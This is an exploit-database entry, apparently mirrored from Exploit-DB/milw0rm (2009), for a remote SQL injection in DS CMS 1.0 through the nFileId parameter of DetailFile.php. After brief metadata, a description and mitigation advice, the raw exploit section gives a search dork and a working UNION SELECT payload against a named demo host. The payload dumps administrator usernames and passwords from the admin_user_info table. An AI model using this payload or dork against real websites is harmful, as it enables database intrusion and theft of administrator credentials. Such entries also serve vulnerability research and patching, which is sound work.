header-logo
Suggest Exploit
vendor:
DS CMS
by:
Mr.tro0oqy
9
CVSS
HIGH
SQL Injection
89
CWE
Product Name: DS CMS
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:digitalspinners:ds_cms:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

DS CMS 1.0 (nFileId) Remote SQL Injection Vulnerability

A remote SQL injection vulnerability exists in DS CMS 1.0. An attacker can send a specially crafted HTTP request to the vulnerable application in order to execute arbitrary SQL commands in the back-end database. This can be exploited to manipulate data, disclose sensitive information, and potentially compromise the system.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Additionally, the application should use parameterized queries to prevent SQL injection.
Source

Exploit-DB raw data:

=======================================================
+++++++++++++++++++ information +++++++++++++++++++++++
=======================================================
[+] Script :DS CMS 1.0 (nFileId) Remote SQL Injection Vulnerability

[+] Script site : http://cms.dsinternal.com/Home 

[+] D0rk : Copyright © DigitalSpinners, 2009.

[+] Found by : Mr.tro0oqy  
   
[+] C0ntact : t.4@windowslive.com <Yemeni ana>
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
exploit:
-------
http://www.xxx.com/path/DetailFile.php?nFileId=[SQL]


Demo:
-----
http://www.cmsdemo.dsinternal.com/DetailFile.php?nFileId=-40+union+select+1,2,3,group_concat%28UserPass,0x3a,UserName%29,5,6+from+admin_user_info--
-----

# milw0rm.com [2009-08-14]